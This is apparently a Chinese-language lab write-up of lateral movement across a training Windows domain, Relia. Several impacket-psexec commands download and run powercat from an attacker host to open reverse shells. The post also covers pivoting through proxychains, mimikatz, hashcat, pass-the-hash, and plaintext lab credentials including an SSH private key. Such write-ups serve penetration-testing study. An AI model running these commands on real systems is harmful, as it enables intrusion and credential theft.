Challenge 2 - Relia(10)

Challenge 2 - Relia(10)

上一章節已經拿到 Relia.com 網域的 Domain Admin,所以接下來就是將網域相關的 Windows 機器一台一台拿下,下一台先將外網的最後一台 .189 拿下,攻擊順序表如下




直接使用 impacket-psexec 進去也可以,但是總覺得 CLI 介面輸出太慢,所以一樣使用 impacket-psexec 但是直接建立一個 Reverse Shell 回來的指令

impacket-psexec relia.com/administrator:'vau!XCKjNQBv2$'@192.168.157.189 "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.202/tools/powercat.ps1');powercat -c 192.168.45.202 -p 4444 -e powershell"



whoami,主機名稱,IP 資訊與 flag 輸出如下,這一台僅有 proof.txt 且是雙網卡



更新攻擊列表完成 .189,下一台選定內網的 .11



透過 impacket-psexec 先進 191,然後搭建 chisel,之後直接透過 proxychains 使用 impacket-psexec 進去 .30

└─$ proxychains4 -q impacket-psexec relia.com/administrator:'vau!XCKjNQBv2$'@172.16.170.30



這一台僅有 proof.txt



後續枚舉僅發現 administrator HASH 有用的資訊而已,其他沒有發現



更新攻擊列表,選定下一台為 relai.com 網域的 DC



直接透過 proxychains 使用 impacket-psexec 建立一個 Reverse shell 回來,└─$ proxychains4 -q impacket-psexec relia.com/administrator:'vau!XCKjNQBv2$'@172.16.170.6 "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.224/tools/powercat.ps1');powercat -c 192.168.45.224 -p 4444 -e powershell"



DC 一樣僅有 proof.txt



DC 後續枚舉沒有發現有用的資訊



僅多紀錄 administrator 的 NTLM HASH



測試看看 HASH,└─$ impacket-psexec -hashes :60446f9e333abfda8c548cbe11daedc2 relia.com/administrator@192.168.210.189,看來沒有問題



更新攻擊順序表,下一個目標是 Relia 公司內的最後一台 Windows 機器



更新帳號密碼表



最後一台 Windows 主機是 WK02,有開 3389 RDP,這一台改採用 RDP 進去,└─$ proxychains4 -q xfreerdp -v:172.16.170.15 -u:'relia\administrator' -p:'vau!XCKjNQBv2$' -drive:lab2,/home/kali/lab2/15

在 andrea 的桌面有 local.txt


使用者 milana 的桌面上有 proof.txt,通常不放在 administrator 的桌面就代表這一台有鬼



果然在 milana 的 Documents 目錄下發現 Keepass 密碼管理器的資料庫




且在垃圾桶內發現 gpo_mod & sarah_ssh 檔案



mimikatz.exe 發現 offsec 的 NTLM HASH



解解看,└─$ hashcat -m 1000 cf998001c44803b490a46f363a2ca812 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force,解不出來



破解 keepass 的資料庫密碼 "destiny1"


裡面有一組 sarah 的密碼與 Notes 裡面寫了 Private Key

sarah:placeholder

-----BEGIN OPENSSH PRIVATE KEY-----

b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW

QyNTUxOQAAACBEhRgOw+Adwr6+R/A54Ng75WK1VsH1f+xloYwIbFnoAwAAAJgtoEZgLaBG

YAAAAAtzc2gtZWQyNTUxOQAAACBEhRgOw+Adwr6+R/A54Ng75WK1VsH1f+xloYwIbFnoAw

AAAECk3NMSFKJMauIwp/DPYEhMV4980aMdDOlfIlTq3qy4SkSFGA7D4B3Cvr5H8Dng2Dvl

YrVWwfV/7GWhjAhsWegDAAAADnRlc3RzQGhhdC13b3JrAQIDBAUGBw==

-----END OPENSSH PRIVATE KEY-----



另外垃圾桶內的 sarah_ssh.zip 解開來是 id_ed25519 內容如下

比對 Keepass 資料庫內的 Notes 是一樣的 Private Key



更新攻擊列表,至此完成了 Relia 公司內所有的 Windows 機器,剩下兩台內網的 Linux 機器



密碼帳號列表更新如下,外加一組 Private Key




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)